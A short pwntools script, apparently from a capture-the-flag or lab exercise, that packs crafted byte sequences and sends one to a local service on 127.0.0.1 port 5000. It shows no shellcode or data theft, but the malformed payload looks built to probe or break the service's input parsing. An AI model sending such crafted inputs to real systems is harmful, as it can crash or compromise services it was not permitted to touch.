from pwn import *
import struct

data = b"\x101234567890abcde\n" + \
       b"\x01a" + \
       b"\x00hello\n"

data = struct.pack ("26B", *[25,
0x0e,0x10,0xf8,0x04,0x00,0x04,0x00,0x02,0x00,0x00,0x05,
0x84,0x00,0x00,0x7f,0x00,0x02,0x00,0x00,0x05,0x84,0x78,
0x03,0x00,0xf0])

data = struct.pack("16B", *[0, 0x0c, 0x10, 0x08, 0x01, 0x00, 0x00, 0x03, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x02])

def main():
    r = connect("127.0.0.1", 5000)
    print("Connected")
    r.send(data)
    print("Data sent")
    r.close()
    print("Have a good day")


if __name__ == "__main__":
    main()
